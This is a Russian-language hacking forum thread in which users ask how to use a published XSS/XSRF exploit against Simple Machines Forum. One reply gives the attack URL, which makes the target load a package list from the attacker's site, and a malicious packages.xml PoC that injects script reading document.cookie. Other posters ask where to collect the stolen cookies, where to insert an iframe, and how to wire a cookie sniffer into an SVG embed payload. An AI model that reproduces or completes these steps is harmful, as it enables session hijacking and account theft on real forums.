Подскажите, как использовать данный эксплойт. Схема действий, хотя бы вкратце.. http://www.exploit-db.com/exploits/7866 Я понимаю, что наверняка много подобных тем, но в поиске почти ничего не нашел... Буду очень благодарен.
http://атакуемыйсайт.com/index.php?action=packageget;sa=browse;absolute=http://твой сайт.com а на нем файл packages.xml с таким вот содержанием: PHP: <?xml version="1.0"?> <!DOCTYPE modification SYSTEM "http://www.simplemachines.org/xml/package-list"> <!-- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - XSRF SMF PoC By Xianur0 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - --> <package-list xmlns="http://www.simplemachines.org/xml/package-list" xmlns:smf="http://www.simplemachines.org/"> <list-title>Xianur0 Was Here</list-title> <section> <title>SMF XSS PoC By Xianur0</title> <text><![CDATA[<script>alert('XSS')</script>]]></text> <modification> <id>Xianur0:XSMF</id> <name>SMF PoC By Xianur0</name> <filename>smfexploit.zip</filename> <version>0.1</version> <author email="[email protected]">Xianur0</author> <description><![CDATA[<script>alert(document.cookie)</script>]]></description> </modification> </section> </package-list> эммм... как бэ вроде так
это я и сам прочитал) Интересует схема действий, при использовании. Где потом брать куки? куда вставлять айфрейм?
плиз как использовать данный script ,как сделать ссылку на снифер в данной ситуации,Спасибо. <EMBED SRC="data:image/svg+xml;base64,как сделать ссылку на снифер" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
